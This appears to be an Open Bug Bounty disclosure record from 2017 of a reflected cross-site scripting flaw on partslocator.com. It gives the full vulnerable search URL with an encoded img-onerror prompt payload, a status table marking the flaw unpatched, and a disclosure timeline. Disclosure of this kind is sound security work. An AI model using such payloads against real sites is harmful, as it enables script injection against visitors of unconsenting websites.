partslocator.com XSS vulnerability

2017-05-18T19:15:00
ID OBB:238753
Type openbugbounty
Reporter secuninja
Modified 2017-06-15T20:14:00

Description

Vulnerable URL:
http://www.partslocator.com/Search/?searchables=ops_article%2Cops_calendarevent%2Cops_geobasedata%2Ccore_page%2Cops_galleryitem%2Cops_customdata&pid;=98%2C95%2C100%2C93&mod;=CoreSearch&tagids;=284%2C293%2C292%2C286%2C294%2C287%2C295%2C290%2C291%2C282%2C283&sortby;=RELEVANCY+DESC&query;=a%253E%27%253E%2522%253Et%253Ci%253Ep%253Cimg%2520src%253Dy%2520onerror%253Dprompt%28%252Fopenbugbounty%252F%29%253E&Search;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1826535
VIP website status:| No
Check partslocator.com SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 May, 2017 19:15 GMT
Notification sent to subscribers (without technical details)| 18 May, 2017 22:17 GMT
Generic security notifications sent to website owner| 27 May, 2017 03:52 GMT
Vulnerability details disclosed by researcher| 15 June, 2017 20:14 GMT